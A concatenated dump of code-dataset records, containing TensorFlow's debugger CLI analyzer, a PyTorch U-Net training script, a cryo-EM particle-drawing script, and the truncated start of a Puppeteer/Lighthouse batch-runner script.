tensor.\n output = cli_shared.error(\"Tensor \\\"%s\\\" did not generate any dumps.\" %\n parsed.tensor_name)\n elif len(matching_data) == 1:\n # There is only one dump for this tensor.\n if parsed.number <= 0:\n output = cli_shared.format_tensor(\n matching_data[0].get_tensor(),\n matching_data[0].watch_key,\n np_printoptions,\n print_all=parsed.print_all,\n tensor_slicing=tensor_slicing,\n highlight_options=highlight_options,\n include_numeric_summary=parsed.numeric_summary,\n write_path=parsed.write_path)\n else:\n output = cli_shared.error(\n \"Invalid number (%d) for tensor %s, which generated one dump.\" %\n (parsed.number, parsed.tensor_name))\n\n _add_main_menu(output, node_name=node_name, enable_print_tensor=False)\n else:\n # There are more than one dumps for this tensor.\n if parsed.number < 0:\n lines = [\n \"Tensor \\\"%s\\\" generated %d dumps:\" % (parsed.tensor_name,\n len(matching_data))\n ]\n font_attr_segs = {}\n\n for i, datum in enumerate(matching_data):\n rel_time = (datum.timestamp - self._debug_dump.t0) / 1000.0\n lines.append(\"#%d [%.3f ms] %s\" % (i, rel_time, datum.watch_key))\n command = \"print_tensor %s -n %d\" % (parsed.tensor_name, i)\n font_attr_segs[len(lines) - 1] = [(\n len(lines[-1]) - len(datum.watch_key), len(lines[-1]),\n debugger_cli_common.MenuItem(None, command))]\n\n lines.append(\"\")\n lines.append(\n \"You can use the -n (--number) flag to specify which dump to \"\n \"print.\")\n lines.append(\"For example:\")\n lines.append(\" print_tensor %s -n 0\" % parsed.tensor_name)\n\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n elif parsed.number >= len(matching_data):\n output = cli_shared.error(\n \"Specified number (%d) exceeds the number of available dumps \"\n \"(%d) for tensor %s\" %\n (parsed.number, len(matching_data), parsed.tensor_name))\n else:\n output = cli_shared.format_tensor(\n matching_data[parsed.number].get_tensor(),\n matching_data[parsed.number].watch_key + \" (dump #%d)\" %\n parsed.number,\n np_printoptions,\n print_all=parsed.print_all,\n tensor_slicing=tensor_slicing,\n highlight_options=highlight_options,\n write_path=parsed.write_path)\n _add_main_menu(output, node_name=node_name, enable_print_tensor=False)\n\n return output\n\n def list_outputs(self, args, screen_info=None):\n \"\"\"Command handler for inputs.\n\n Show inputs to a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # Screen info not currently used by this handler. Include this line to\n # mute pylint.\n _ = screen_info\n # TODO(cais): Use screen info to format the output lines more prettily,\n # e.g., hanging indent of long node names.\n\n parsed = self._arg_parsers[\"list_outputs\"].parse_args(args)\n\n output = self._list_inputs_or_outputs(\n parsed.recursive,\n parsed.node_name,\n parsed.depth,\n parsed.control,\n parsed.op_type,\n do_outputs=True)\n\n node_name = debug_graphs.get_node_name(parsed.node_name)\n _add_main_menu(output, node_name=node_name, enable_list_outputs=False)\n\n return output\n\n def evaluate_expression(self, args, screen_info=None):\n parsed = self._arg_parsers[\"eval\"].parse_args(args)\n\n eval_res = self._evaluator.evaluate(parsed.expression)\n\n np_printoptions = cli_shared.numpy_printoptions_from_screen_info(\n screen_info)\n return cli_shared.format_tensor(\n eval_res,\n \"from eval of expression '%s'\" % parsed.expression,\n np_printoptions,\n print_all=parsed.print_all,\n include_numeric_summary=True,\n write_path=parsed.write_path)\n\n def _reconstruct_print_source_command(self,\n parsed,\n line_begin,\n max_elements_per_line_increase=0):\n return \"ps %s %s -b %d -m %d\" % (\n parsed.source_file_path, \"-t\" if parsed.tensors else \"\", line_begin,\n parsed.max_elements_per_line + max_elements_per_line_increase)\n\n def print_source(self, args, screen_info=None):\n \"\"\"Print the content of a source file.\"\"\"\n del screen_info # Unused.\n\n parsed = self._arg_parsers[\"print_source\"].parse_args(args)\n\n source_annotation = source_utils.annotate_source(\n self._debug_dump,\n parsed.source_file_path,\n do_dumped_tensors=parsed.tensors)\n\n source_lines, line_num_width = source_utils.load_source(\n parsed.source_file_path)\n\n labeled_source_lines = []\n actual_initial_scroll_target = 0\n for i, line in enumerate(source_lines):\n annotated_line = RL(\"L%d\" % (i + 1), cli_shared.COLOR_YELLOW)\n annotated_line += \" \" * (line_num_width - len(annotated_line))\n annotated_line += line\n labeled_source_lines.append(annotated_line)\n\n if i + 1 == parsed.line_begin:\n actual_initial_scroll_target = len(labeled_source_lines) - 1\n\n if i + 1 in source_annotation:\n sorted_elements = sorted(source_annotation[i + 1])\n for k, element in enumerate(sorted_elements):\n if k >= parsed.max_elements_per_line:\n omitted_info_line = RL(\" (... Omitted %d of %d %s ...) \" % (\n len(sorted_elements) - parsed.max_elements_per_line,\n len(sorted_elements),\n \"tensor(s)\" if parsed.tensors else \"op(s)\"))\n omitted_info_line += RL(\n \"+5\",\n debugger_cli_common.MenuItem(\n None,\n self._reconstruct_print_source_command(\n parsed, i + 1, max_elements_per_line_increase=5)))\n labeled_source_lines.append(omitted_info_line)\n break\n\n label = RL(\" \" * 4)\n if self._debug_dump.debug_watch_keys(\n debug_graphs.get_node_name(element)):\n attribute = debugger_cli_common.MenuItem(\"\", \"pt %s\" % element)\n else:\n attribute = cli_shared.COLOR_BLUE\n\n label += RL(element, attribute)\n labeled_source_lines.append(label)\n\n output = debugger_cli_common.rich_text_lines_from_rich_line_list(\n labeled_source_lines,\n annotations={debugger_cli_common.INIT_SCROLL_POS_KEY:\n actual_initial_scroll_target})\n _add_main_menu(output, node_name=None)\n return output\n\n def _make_source_table(self, source_list, is_tf_py_library):\n \"\"\"Make a table summarizing the source files that create nodes and tensors.\n\n Args:\n source_list: List of source files and related information as a list of\n tuples (file_path, is_tf_library, num_nodes, num_tensors, num_dumps,\n first_line).\n is_tf_py_library: (`bool`) whether this table is for files that belong\n to the TensorFlow Python library.\n\n Returns:\n The table as a `debugger_cli_common.RichTextLines` object.\n \"\"\"\n path_head = \"Source file path\"\n num_nodes_head = \"#(nodes)\"\n num_tensors_head = \"#(tensors)\"\n num_dumps_head = \"#(tensor dumps)\"\n\n if is_tf_py_library:\n # Use color to mark files that are guessed to belong to TensorFlow Python\n # library.\n color = cli_shared.COLOR_GRAY\n lines = [RL(\"TensorFlow Python library file(s):\", color)]\n else:\n color = cli_shared.COLOR_WHITE\n lines = [RL(\"File(s) outside TensorFlow Python library:\", color)]\n\n if not source_list:\n lines.append(RL(\"[No files.]\"))\n lines.append(RL())\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n path_column_width = max(\n max(len(item[0]) for item in source_list), len(path_head)) + 1\n num_nodes_column_width = max(\n max(len(str(item[2])) for item in source_list),\n len(num_nodes_head)) + 1\n num_tensors_column_width = max(\n max(len(str(item[3])) for item in source_list),\n len(num_tensors_head)) + 1\n\n head = RL(path_head + \" \" * (path_column_width - len(path_head)), color)\n head += RL(num_nodes_head + \" \" * (\n num_nodes_column_width - len(num_nodes_head)), color)\n head += RL(num_tensors_head + \" \" * (\n num_tensors_column_width - len(num_tensors_head)), color)\n head += RL(num_dumps_head, color)\n\n lines.append(head)\n\n for (file_path, _, num_nodes, num_tensors, num_dumps,\n first_line_num) in source_list:\n path_attributes = [color]\n if source_utils.is_extension_uncompiled_python_source(file_path):\n path_attributes.append(\n debugger_cli_common.MenuItem(None, \"ps %s -b %d\" %\n (file_path, first_line_num)))\n\n line = RL(file_path, path_attributes)\n line += \" \" * (path_column_width - len(line))\n line += RL(\n str(num_nodes) + \" \" * (num_nodes_column_width - len(str(num_nodes))),\n color)\n line += RL(\n str(num_tensors) + \" \" *\n (num_tensors_column_width - len(str(num_tensors))), color)\n line += RL(str(num_dumps), color)\n lines.append(line)\n lines.append(RL())\n\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n def list_source(self, args, screen_info=None):\n \"\"\"List Python source files that constructed nodes and tensors.\"\"\"\n del screen_info # Unused.\n\n parsed = self._arg_parsers[\"list_source\"].parse_args(args)\n source_list = source_utils.list_source_files_against_dump(\n self._debug_dump,\n path_regex_allowlist=parsed.path_filter,\n node_name_regex_allowlist=parsed.node_name_filter)\n\n top_lines = [\n RL(\"List of source files that created nodes in this run\", \"bold\")]\n if parsed.path_filter:\n top_lines.append(\n RL(\"File path regex filter: \\\"%s\\\"\" % parsed.path_filter))\n if parsed.node_name_filter:\n top_lines.append(\n RL(\"Node name regex filter: \\\"%s\\\"\" % parsed.node_name_filter))\n top_lines.append(RL())\n output = debugger_cli_common.rich_text_lines_from_rich_line_list(top_lines)\n if not source_list:\n output.append(\"[No source file information.]\")\n return output\n\n output.extend(self._make_source_table(\n [item for item in source_list if not item[1]], False))\n output.extend(self._make_source_table(\n [item for item in source_list if item[1]], True))\n _add_main_menu(output, node_name=None)\n return output\n\n def _list_inputs_or_outputs(self,\n recursive,\n node_name,\n depth,\n control,\n op_type,\n do_outputs=False):\n \"\"\"Helper function used by list_inputs and list_outputs.\n\n Format a list of lines to display the inputs or output recipients of a\n given node.\n\n Args:\n recursive: Whether the listing is to be done recursively, as a boolean.\n node_name: The name of the node in question, as a str.\n depth: Maximum recursion depth, applies only if recursive == True, as an\n int.\n control: Whether control inputs or control recipients are included, as a\n boolean.\n op_type: Whether the op types of the nodes are to be included, as a\n boolean.\n do_outputs: Whether recipients, instead of input nodes are to be\n listed, as a boolean.\n\n Returns:\n Input or recipient tree formatted as a RichTextLines object.\n \"\"\"\n\n if do_outputs:\n tracker = self._debug_dump.node_recipients\n type_str = \"Recipients of\"\n short_type_str = \"recipients\"\n else:\n tracker = self._debug_dump.node_inputs\n type_str = \"Inputs to\"\n short_type_str = \"inputs\"\n\n lines = []\n font_attr_segs = {}\n\n # Check if this is a tensor name, instead of a node name.\n node_name, _ = debug_graphs.parse_node_or_tensor_name(node_name)\n\n # Check if node exists.\n if not self._debug_dump.node_exists(node_name):\n return cli_shared.error(\n \"There is no node named \\\"%s\\\" in the partition graphs\" % node_name)\n\n if recursive:\n max_depth = depth\n else:\n max_depth = 1\n\n if control:\n include_ctrls_str = \", control %s included\" % short_type_str\n else:\n include_ctrls_str = \"\"\n\n line = \"%s node \\\"%s\\\"\" % (type_str, node_name)\n font_attr_segs[0] = [(len(line) - 1 - len(node_name), len(line) - 1, \"bold\")\n ]\n lines.append(line + \" (Depth limit = %d%s):\" % (max_depth, include_ctrls_str\n ))\n\n command_template = \"lo -c -r %s\" if do_outputs else \"li -c -r %s\"\n self._dfs_from_node(\n lines,\n font_attr_segs,\n node_name,\n tracker,\n max_depth,\n 1, [],\n control,\n op_type,\n command_template=command_template)\n\n # Include legend.\n lines.append(\"\")\n lines.append(\"Legend:\")\n lines.append(\" (d): recursion depth = d.\")\n\n if control:\n lines.append(\" (Ctrl): Control input.\")\n if op_type:\n lines.append(\" [Op]: Input node has op type Op.\")\n\n # TODO(cais): Consider appending \":0\" at the end of 1st outputs of nodes.\n\n return debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n def _dfs_from_node(self,\n lines,\n attr_segs,\n node_name,\n tracker,\n max_depth,\n depth,\n unfinished,\n include_control=False,\n show_op_type=False,\n command_template=None):\n \"\"\"Perform depth-first search (DFS) traversal of a node's input tree.\n\n It recursively tracks the inputs (or output recipients) of the node called\n node_name, and append these inputs (or output recipients) to a list of text\n lines (lines) with proper indentation that reflects the recursion depth,\n together with some formatting attributes (to attr_segs). The formatting\n attributes can include command shortcuts, for example.\n\n Args:\n lines: Text lines to append to, as a list of str.\n attr_segs: (dict) Attribute segments dictionary to append to.\n node_name: Name of the node, as a str. This arg is updated during the\n recursion.\n tracker: A callable that takes one str as the node name input and\n returns a list of str as the inputs/outputs.\n This makes it this function general enough to be used with both\n node-input and node-output tracking.\n max_depth: Maximum recursion depth, as an int.\n depth: Current recursion depth. This arg is updated during the\n recursion.\n unfinished: A stack of unfinished recursion depths, as a list of int.\n include_control: Whether control dependencies are to be included as\n inputs (and marked as such).\n show_op_type: Whether op type of the input nodes are to be displayed\n alongside the nodes' names.\n command_template: (str) Template for command shortcut of the node names.\n \"\"\"\n\n # Make a shallow copy of the list because it may be extended later.\n all_inputs = self._exclude_denylisted_ops(\n copy.copy(tracker(node_name, is_control=False)))\n is_ctrl = [False] * len(all_inputs)\n if include_control:\n # Sort control inputs or recipients in alphabetical order of the node\n # names.\n ctrl_inputs = self._exclude_denylisted_ops(\n sorted(tracker(node_name, is_control=True)))\n all_inputs.extend(ctrl_inputs)\n is_ctrl.extend([True] * len(ctrl_inputs))\n\n if not all_inputs:\n if depth == 1:\n lines.append(\" [None]\")\n\n return\n\n unfinished.append(depth)\n\n # Create depth-dependent hanging indent for the line.\n hang = \"\"\n for k in range(depth):\n if k < depth - 1:\n if k + 1 in unfinished:\n hang += HANG_UNFINISHED\n else:\n hang += HANG_FINISHED\n else:\n hang += HANG_SUFFIX\n\n if all_inputs and depth > max_depth:\n lines.append(hang + ELLIPSIS)\n unfinished.pop()\n return\n\n hang += DEPTH_TEMPLATE % depth\n\n for i, inp in enumerate(all_inputs):\n op_type = self._debug_dump.node_op_type(debug_graphs.get_node_name(inp))\n if op_type in self._GRAPH_STRUCT_OP_TYPE_DENYLIST:\n continue\n\n if is_ctrl[i]:\n ctrl_str = CTRL_LABEL\n else:\n ctrl_str = \"\"\n\n op_type_str = \"\"\n if show_op_type:\n op_type_str = OP_TYPE_TEMPLATE % op_type\n\n if i == len(all_inputs) - 1:\n unfinished.pop()\n\n line = hang + ctrl_str + op_type_str + inp\n lines.append(line)\n if command_template:\n attr_segs[len(lines) - 1] = [(\n len(line) - len(inp), len(line),\n debugger_cli_common.MenuItem(None, command_template % inp))]\n\n # Recursive call.\n # The input's/output's name can be a tensor name, in the case of node\n # with >1 output slots.\n inp_node_name, _ = debug_graphs.parse_node_or_tensor_name(inp)\n self._dfs_from_node(\n lines,\n attr_segs,\n inp_node_name,\n tracker,\n max_depth,\n depth + 1,\n unfinished,\n include_control=include_control,\n show_op_type=show_op_type,\n command_template=command_template)\n\n def _format_neighbors(self, neighbor_type, non_ctrls, ctrls):\n \"\"\"List neighbors (inputs or recipients) of a node.\n\n Args:\n neighbor_type: (\"input\" | \"recipient\")\n non_ctrls: Non-control neighbor node names, as a list of str.\n ctrls: Control neighbor node names, as a list of str.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n # TODO(cais): Return RichTextLines instead, to allow annotation of node\n # names.\n lines = []\n font_attr_segs = {}\n\n lines.append(\"\")\n lines.append(\" %d %s(s) + %d control %s(s):\" %\n (len(non_ctrls), neighbor_type, len(ctrls), neighbor_type))\n lines.append(\" %d %s(s):\" % (len(non_ctrls), neighbor_type))\n for non_ctrl in non_ctrls:\n line = \" [%s] %s\" % (self._debug_dump.node_op_type(non_ctrl),\n non_ctrl)\n lines.append(line)\n font_attr_segs[len(lines) - 1] = [(\n len(line) - len(non_ctrl), len(line),\n debugger_cli_common.MenuItem(None, \"ni -a -d -t %s\" % non_ctrl))]\n\n if ctrls:\n lines.append(\"\")\n lines.append(\" %d control %s(s):\" % (len(ctrls), neighbor_type))\n for ctrl in ctrls:\n line = \" [%s] %s\" % (self._debug_dump.node_op_type(ctrl), ctrl)\n lines.append(line)\n font_attr_segs[len(lines) - 1] = [(\n len(line) - len(ctrl), len(line),\n debugger_cli_common.MenuItem(None, \"ni -a -d -t %s\" % ctrl))]\n\n return debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n def _list_node_attributes(self, node_name):\n \"\"\"List neighbors (inputs or recipients) of a node.\n\n Args:\n node_name: Name of the node of which the attributes are to be listed.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n lines = []\n lines.append(\"\")\n lines.append(\"Node attributes:\")\n\n attrs = self._debug_dump.node_attributes(node_name)\n for attr_key in attrs:\n lines.append(\" %s:\" % attr_key)\n attr_val_str = repr(attrs[attr_key]).strip().replace(\"\\n\", \" \")\n lines.append(\" %s\" % attr_val_str)\n lines.append(\"\")\n\n return debugger_cli_common.RichTextLines(lines)\n\n def _list_node_dumps(self, node_name):\n \"\"\"List dumped tensor data from a node.\n\n Args:\n node_name: Name of the node of which the attributes are to be listed.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n lines = []\n font_attr_segs = {}\n\n watch_keys = self._debug_dump.debug_watch_keys(node_name)\n\n dump_count = 0\n for watch_key in watch_keys:\n debug_tensor_data = self._debug_dump.watch_key_to_data(watch_key)\n for datum in debug_tensor_data:\n line = \" Slot %d @ %s @ %.3f ms\" % (\n datum.output_slot, datum.debug_op,\n (datum.timestamp - self._debug_dump.t0) / 1000.0)\n lines.append(line)\n command = \"pt %s:%d -n %d\" % (node_name, datum.output_slot, dump_count)\n font_attr_segs[len(lines) - 1] = [(\n 2, len(line), debugger_cli_common.MenuItem(None, command))]\n dump_count += 1\n\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n output_with_header = debugger_cli_common.RichTextLines(\n [\"%d dumped tensor(s):\" % dump_count, \"\"])\n output_with_header.extend(output)\n return output_with_header\n\n\ndef create_analyzer_ui(debug_dump,\n tensor_filters=None,\n ui_type=\"readline\",\n on_ui_exit=None,\n config=None):\n \"\"\"Create an instance of ReadlineUI based on a DebugDumpDir object.\n\n Args:\n debug_dump: (debug_data.DebugDumpDir) The debug dump to use.\n tensor_filters: (dict) A dict mapping tensor filter name (str) to tensor\n filter (Callable).\n ui_type: (str) requested UI type, only \"readline\" is supported.\n on_ui_exit: (`Callable`) the callback to be called when the UI exits.\n config: A `cli_config.CLIConfig` object.\n\n Returns:\n (base_ui.BaseUI) A BaseUI subtype object with a set of standard analyzer\n commands and tab-completions registered.\n \"\"\"\n if config is None:\n config = cli_config.CLIConfig()\n\n analyzer = DebugAnalyzer(debug_dump, config=config)\n if tensor_filters:\n for tensor_filter_name in tensor_filters:\n analyzer.add_tensor_filter(\n tensor_filter_name, tensor_filters[tensor_filter_name])\n\n cli = ui_factory.get_ui(ui_type, on_ui_exit=on_ui_exit, config=config)\n cli.register_command_handler(\n \"list_tensors\",\n analyzer.list_tensors,\n analyzer.get_help(\"list_tensors\"),\n prefix_aliases=[\"lt\"])\n cli.register_command_handler(\n \"node_info\",\n analyzer.node_info,\n analyzer.get_help(\"node_info\"),\n prefix_aliases=[\"ni\"])\n cli.register_command_handler(\n \"list_inputs\",\n analyzer.list_inputs,\n analyzer.get_help(\"list_inputs\"),\n prefix_aliases=[\"li\"])\n cli.register_command_handler(\n \"list_outputs\",\n analyzer.list_outputs,\n analyzer.get_help(\"list_outputs\"),\n prefix_aliases=[\"lo\"])\n cli.register_command_handler(\n \"print_tensor\",\n analyzer.print_tensor,\n analyzer.get_help(\"print_tensor\"),\n prefix_aliases=[\"pt\"])\n cli.register_command_handler(\n \"print_source\",\n analyzer.print_source,\n analyzer.get_help(\"print_source\"),\n prefix_aliases=[\"ps\"])\n cli.register_command_handler(\n \"list_source\",\n analyzer.list_source,\n analyzer.get_help(\"list_source\"),\n prefix_aliases=[\"ls\"])\n cli.register_command_handler(\n \"eval\",\n analyzer.evaluate_expression,\n analyzer.get_help(\"eval\"),\n prefix_aliases=[\"ev\"])\n\n dumped_tensor_names = []\n for datum in debug_dump.dumped_tensor_data:\n dumped_tensor_names.append(\"%s:%d\" % (datum.node_name, datum.output_slot))\n\n # Tab completions for command \"print_tensors\".\n cli.register_tab_comp_context([\"print_tensor\", \"pt\"], dumped_tensor_names)\n\n return cli\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/debug/cli/analyzer_cli.py","file_name":"analyzer_cli.py","file_ext":"py","file_size_in_byte":57643,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"}
+{"seq_id":"28467815832","text":"# -*- coding: utf-8 -*-\n'''\nDescription: structure of Unet\n'''\nfrom model_parts import *\nimport torch\nfrom torch import optim\n\n\nclass UNet(nn.Module):\n def __init__(self, n_channels, n_classes):\n super(UNet, self).__init__()\n\n #进行下采样\n self.inc = inconv(n_channels, 16) \n self.down1 = down(16, 32) \n self.down2 = down(32, 64) \n self.down3 = down(64, 128) \n self.down4 = down(128, 128) \n\n #进行上采样\n self.up1 = up(256, 64, 128) \n self.up2 = up(128, 32, 64) \n self.up3 = up(64, 16, 32) \n self.up4 = up(32, 16, 16) \n self.outc = outconv(16, n_classes)\n\n ##网络前向传播\n def forward(self, x_raw):\n\n x1 = self.inc(x_raw)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x)\n\n return x\n\n ###网络参数初始化,此处使用凯明分布\n def weight_init(self):\n for m in self._modules:\n weights_init_kaiming(m)\n\n\ndef weights_init_kaiming(m):\n class_name = m.__class__.__name__\n if class_name.find('Linear') != -1:\n torch.nn.init.kaiming_normal_(m.weight) # 利用凯明均匀分布来进行初始化\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('Conv2d') != -1:\n torch.nn.init.kaiming_normal_(m.weight)\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('ConvTranspose2d') != -1:\n torch.nn.init.kaiming_normal_(m.weight)\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('Norm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n if m.bias is not None:\n m.bias.data.zero_()\n\nif __name__ == '__main__':\n\n UNet_model = UNet(3, 1) # 输入数据的channel为3,输出数据的channel为1\n optimizer = optim.Adam(UNet_model.parameters(), lr=0.001, weight_decay=0.0001)\n loss_func = nn.MSELoss(reduction='sum')\n train_loss = 0\n\n #进行100次模拟训练\n for i in range(100):\n ##模拟训练数据\n img = torch.rand(2, 3, 600, 600)\n ##模拟真实值\n label = torch.rand(2, 1, 600, 600)\n #模型前向传播计算\n img_pred = UNet_model(img)\n loss = loss_func(label, img_pred)\n\n ##优化器反向传播操作\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()##更新权重\n train_loss += loss\n\n #每训练10次便记录一次误差值\n if i % 10 == 0:\n print(\"iter:{},loss:{}\".format(i, train_loss / 10))\n train_loss = 0\n\n\n","repo_name":"TianyiXiong1998/Projects-Repository","sub_path":"CU-net/Unet.py","file_name":"Unet.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"8483141404","text":"import cv2\nimport sys, os,getopt \nfrom mpi4py import MPI\nfrom EMAN2 import *\nimport numpy as np\ndef readStar(fin):\n f=open(fin,'r');\n l=f.readlines();\n count=0;\n for r in l:\n s=r.split();\n if len(s)>1:\n c=s[0][1];\n if c.isdigit()==1:\n break;\n count=count+1;\n else:\n count=count+1;\n\n l=l[count:];\n\n return l;\n\n\n\ndef normImg(img,n):\n imax=np.max(img);\n imin=np.min(img);\n a=float(255)/(imax-imin);\n b=(-1)*a*imin;\n\n sizex=img.shape[0];\n sizey=img.shape[1];\n arr=np.zeros([sizex,sizey]);\n arr=np.round(a*img+b).astype(int);\n\n amax=np.max(arr);\n amin=np.min(arr);\n amean=np.mean(arr);\n astd=np.std(arr);\n\n bmin=amean-astd*n;\n bmax=amean+astd*n;\n c=float(255)/(bmax-bmin);\n d=(-1)*c*bmin;\n\n arr2=np.round(c*arr+d).astype(int);\n for x in range(0,sizex):\n for y in range(0,sizey):\n if arr2[x,y]<0:\n arr2[x,y]=0;\n elif arr2[x,y]>255:\n arr2[x,y]=255;\n\n arr3=np.zeros([sizex,sizey,3]);\n arr3[:,:,0]=arr2[:,:];\n arr3[:,:,1]=arr2[:,:];\n arr3[:,:,2]=arr2[:,:];\n\n return arr3;\n\ndef norm(fin,n):\n em=EMData(fin);\n img=EMNumPy.em2numpy(em);\n arr2=normImg(img,n);\n return arr2;\n\ndef drawOri(im,cx,cy, sx,sy,count):\n startx=cx-sx/2;\n starty=cy-sx/2;\n endx=cx+sx/2;\n endy=cy+sx/2;\n\n cv2.rectangle(im, (startx, starty), (endx, endy), (255,0,0), 2)\n\ndef draw(im,cx,cy, sx,sy,r,g,b,shape,r1,g1,b1):\n startx=cx-sx/2;\n starty=cy-sx/2;\n endx=cx+sx/2;\n endy=cy+sx/2;\n\n w=3;\n\n if shape==0:\n cv2.rectangle(im, (startx, starty), (endx, endy), (b,g,r), w)\n elif shape==1:\n cv2.circle(im,(cx,cy), sx/2, (b,g,r), w)\n elif shape==2:\n cv2.rectangle(im, (startx, starty), (endx, endy), (b,g,r), w)\n cv2.circle(im,(cx,cy), 10, (b1,g1,r1), w)\n\ndef getCors(fstar):\n f=open(fstar,'r');\n plist=f.readlines();\n plist=plist[6:]\n return plist;\n\n\ndef drawOne(fin,fstar,pSize,fout,start,stop, step,shape,arrColor,color):\n plist=readStar(fstar);\n\n if(fin[-3:]=='png'):\n im = cv2.imread(fin);\n elif (fin[-3:]=='mrc'):\n im=norm(fin,2);\n \n sx=pSize;\n sy=pSize;\n\n sizex,sizey,sizez=im.shape;\n\n count=0;\n cx=0;\n cy=0;\n \n index=0;\n p=cp=0;\n for line in plist:\n if count>=start and count1:\n x=float(s[0]);\n x=int(x);\n y=float(s[1]);\n y=int(y);\n\n if len(s)>=3:\n p=float(s[2])\n else:\n p=1;\n\n if len(s)==4:\n cp=float(s[3]);\n else:\n cp=0;\n\n if color==-1:\n index=int((count-20)/step);\n if index<0:\n index=0;\n elif index>9:\n index=9;\n else:\n index=int(color);\n\n r,g,b=arrColor[index]\n\n if color==-1:\n cdex=int((cp-0.5)*10);\n if cdex<0:\n cdex=0;\n else:\n cdex=int(color);\n r1,g1,b1=arrColor[cdex];\n\n draw(im,x,y,sx,sy,r,g,b,shape,r1,g1,b1);\n count=count+1;\n \n cv2.imwrite(fout,im);\n\n\ndef usage():\n print(\"mpiexec -n 6 -i /home/ict/dataset/objEmDb/experiment/empiar10005/data2 \\\n -o /home/ict/dataset/objEmDb/experiment/empiar10005/rec \\\n -s /home/ict/dataset/objEmDb/experiment/empiar10005/autopick-results-by-demo-type3-iter1-2 \\\n -p 200 -d\");\n\nif __name__==\"__main__\":\n opts, args = getopt.getopt(sys.argv[1:], \"i:o:s:p:z:q:c:n:f:e:dmh\") \n din=\"\" \n dout=\"\"\n dstar=\"\"\n pSize=0;\n isDir=0;\n shape=0;\n isMrc=-1;\n start=30;\n step=10;\n color=-1;\n stop=200000;\n\n for op, value in opts: \n if op == \"-i\": \n din = value \n elif op == \"-o\": \n dout = value\n elif op ==\"-s\":\n dstar= value;\n elif op ==\"-p\":\n pSize=int(value)\n elif op ==\"-z\":\n start=float(value)\n elif op ==\"-e\":\n stop=float(value)\n elif op ==\"-c\":\n step=int(value)\n elif op ==\"-q\":\n color=int(value)\n elif op ==\"-f\":\n shape=int(value)\n elif op==\"-d\":\n isDir=1\n elif op==\"-m\":\n isMrc=1\n elif op==\"-n\":\n dnum=int(value);\n elif op == \"-h\": \n usage() \n din='/home/ict/pickyEye/empiar10075/relion/pickyEye/empiar10075/data/FoilHole_19046908_Data_19046157_19046158_20140520_0021_frames_SumCorr.png'\n dstar='/home/ict/pickyEye/empiar10075/relion/pickyEye/empiar10075/star/FoilHole_19046908_Data_19046157_19046158_20140520_0021_frames_SumCorr.star';\n dout='./test.png'\n start=50;\n step=10;\n shape=1;\n pSize=300;\n\n a=np.zeros([27,3]);\n index =0;\n \n a[0]=255,0,0;\n a[1]=0,0,255;\n a[2]=0,255,0;\n a[3]=255,0,255;\n a[4]=0,255,255;\n a[5]=255,255,0;\n a[6]=75,0,130;\n a[7]=0,100,0;\n a[8]=128,0,0;\n a[9]=128,128,0;\n a[10]=0,0,0;\n print(din,dout,dstar,pSize);\n if isDir ==1:\n comm=MPI.COMM_WORLD\n crank=comm.Get_rank();\n csize=comm.Get_size();\n\n if crank==0:\n if os.path.isdir(dout)==0:\n os.mkdir(dout);\n comm.barrier();\n\n\n fins=os.listdir(dstar);\n for i in range(crank,len(fins),csize):\n f=fins[i];\n if f[-4:]=='star' :\n fin=f[:-5]+'.png';\n fin=os.path.join(din,fin);\n\n if os.path.exists(fin)==0:\n fin=f[:-5]+'.mrc';\n fin=os.path.join(din,fin);\n if os.path.exists(fin)==1:\n fstar=os.path.join(dstar,f);\n fout=f[:-5]+'.png';\n fout=os.path.join(dout,fout);\n if os.path.exists(fstar)==1:\n print(fstar, fin);\n drawOne(fin,fstar,pSize,fout,start,stop, step, shape,a,color);\n else:\n print('no file:', fin);\n\n comm.barrier();\n else:\n drawOne(din,dstar,pSize,dout,start, step, shape,a,color);\n","repo_name":"smart111/PIXER","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"19995945799","text":"#!/usr/bin/env python3\nimport datetime\nimport glob\nimport logging\nimport os\nimport subprocess\nimport sys\nimport tarfile\n\nimport ncscli.batchRunner as batchRunner\n\n\nclass PuppeteerLighthouseFrameProcessor(batchRunner.frameProcessor):\n '''defines details for using Puppeteer and Lighthouse to analyze a web page from multiple devices'''\n\n def installerCmd( self ):\n return 'apt-get -qq update > /dev/null && apt-get -qq install -y chromium nodejs npm > /dev/null && ln -s chromium /usr/bin/chromium-browser && PUPPETEER_SKIP_DOWNLOAD=yes npm install --quiet -g puppeteer && npm install --quiet -g lighthouse@6.5.0'\n\n PuppeteerFilePath = 'Puppeteer.js'\n\n def frameOutFileName( self, frameNum ):\n return 'Puppeteer_results_%03d.tar.gz' % frameNum\n\n def frameCmd( self, frameNum ):\n cmd = 'date && export NODE_PATH=/usr/local/lib/node_modules && export PATH=$PATH:/usr/local/bin && node %s && lighthouse https://www.google.com --no-enable-error-reporting --chrome-flags=\"--headless 